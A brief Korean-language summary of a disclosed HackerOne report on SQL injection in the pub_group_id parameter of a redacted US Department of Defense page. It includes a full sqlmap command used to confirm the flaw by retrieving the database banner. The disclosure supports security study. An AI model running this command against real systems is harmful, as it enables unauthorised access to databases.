hackerone-us-dept-of-defense-2019-10-h-489483
SQL Injection in the get_publications.php on the https://█████
GET 파라미터에서 SQLi가 발생했다. 페이로드의 형태를 보면 sqlmap을 이용하여 찾은 것으로 보인다.
sqlmap을 이용해 PoC 했다.
sqlmap.py -r test.txt --dbms=mysql --technique=T -p pub_group_id --banner --force-ssl --level=5 명령어를 통해 OS 배너를 잡아 PoC 했다.
tags: bughunting, wstg-inpv-05, sqli, web hacking, severity high